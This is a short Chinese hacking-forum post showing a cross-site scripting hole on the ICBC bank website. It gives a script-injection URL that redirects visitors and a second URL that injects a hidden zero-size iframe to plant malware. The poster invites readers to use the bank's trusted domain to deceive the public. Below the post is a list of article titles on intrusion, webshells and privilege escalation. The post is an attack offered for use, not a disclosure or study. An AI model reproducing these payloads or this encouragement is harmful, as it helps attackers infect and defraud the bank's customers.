[组图]跨站工商银行...工行有漏洞哦!工商银行出跨站了....给大家看看...
在浏览器中提交跨站代码:http://www.icbc.com.cn/news/hotspot.jsp?column=%3Cscript%3Ealert("我操,我汤姆不发威,拿我当病老虎啊!");location.href%3D%22http%3A%2F%2F%22%3C/script%3E/
接着出现下图:
看到了吧,存在跨站漏洞,下面挂个马儿看看...
在浏览器中提交跨站代码:http://www.icbc.com.cn/news/hotspot.jsp?column=<iframe%20src="http:/ ... quot;%20width=0%20height=0></iframe>
看看是不是挂上了,这个跟百度那个跨站挂马,都可以运用大家对这个网站的信任去欺骗群众,哈哈,这话有些阴险...大家自己去发挥吧!
| 利用php.exe进行入侵 | 04-08 | |
| 渗透心得 | 04-07 | |
| 魔力论坛最新漏洞利用 | 04-07 | |
| 织梦内容管理系统(DEDECMS)3.X | 04-07 | |
| asp.dll解析成system提升权限 | 04-06 | |
| webshell+serv-u获取系统最高权限 | 04-06 | |
| 一次完全利用社会工程学的域名劫 | 03-28 | |
| 利用DNS欺骗在局域网中挂马 | 03-21 | |
| 渗透某资源网站笔记 | 03-20 | |
| 渗透同学学校网络 | 03-20 | |
| 针对虚拟主机提升权限的实现 | 03-20 | |
| 利用QQ文件共享漏洞入侵 Windows | 03-20 | |
您现在的位置: